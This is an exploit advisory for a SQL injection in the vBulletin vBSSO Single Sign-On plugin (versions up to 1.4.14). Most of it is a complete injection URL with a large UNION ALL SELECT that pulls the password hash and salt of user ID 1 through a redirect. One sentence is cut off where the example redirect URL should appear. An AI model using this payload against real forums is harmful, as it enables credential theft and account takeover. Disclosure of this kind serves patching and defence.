vBulletin vBSSO Single Sign-On 1.4.14 - SQL Injection








# Exploit Title: vBulletin vBSSO Single Sign-On – <= 1.4.14 – SQL Injection
# Date: January 20, 2015
# Exploit Author: Technidev (https://technidev.com)
# Vendor Homepage: https://vbulletin.com
# Software Link: http://www.vbulletin.org/forum/showthread.php?t=270517
# Version: <= 1.4.14, patched in >= 1.4.15

This plugin is vulnerable to SQL injection at the /vbsso/avatar.php file 
in the fetchUserinfo function.
It requires a big UNION ALL SELECT query and commenting out the LIMIT 
function of SQL. If SQL injection is a success, the browser will 
redirect the user to a URL where the URL contains the extracted information.

To exploit this, you need to execute a rather large UNION ALL SELECT 
query like this:
http://example.com/vbsso/vbsso.php?a=act&do=avatar&id=' or user.userid = 
1 UNION ALL SELECT userfield.*, usertextfield.*, user.*, 
usergroup.genericpermissions, UNIX_TIMESTAMP(passworddate) AS 
passworddate, IF(displaygroupid=0, user.usergroupid, displaygroupid) AS 
displaygroupid, concat(user.password, 0x3a, user.salt) AS avatarpath, 
NOT ISNULL(customavatar.userid) AS hascustomavatar, 
customavatar.dateline AS avatardateline, customavatar.width AS avwidth, 
customavatar.height AS avheight, customavatar.height_thumb AS 
avheight_thumb, customavatar.width_thumb AS avwidth_thumb, 
customavatar.filedata_thumb FROM user AS user LEFT JOIN userfield AS 
userfield ON (user.userid = userfield.userid) LEFT JOIN usergroup AS 
usergroup ON (usergroup.usergroupid = user.usergroupid) LEFT JOIN 
usertextfield AS usertextfield ON (usertextfield.userid = user.userid) 
LEFT JOIN avatar AS avatar ON (avatar.avatarid = user.avatarid) LEFT 
JOIN customavatar AS customavatar ON (customavatar.userid = user.userid) 
WHERE user.userid = 1 ORDER BY avatarpath DESC%23

For example, by visiting this URL on a vulnerable forum, you will be 
redirected to 
which obviously contains the hash and salt of userid 1.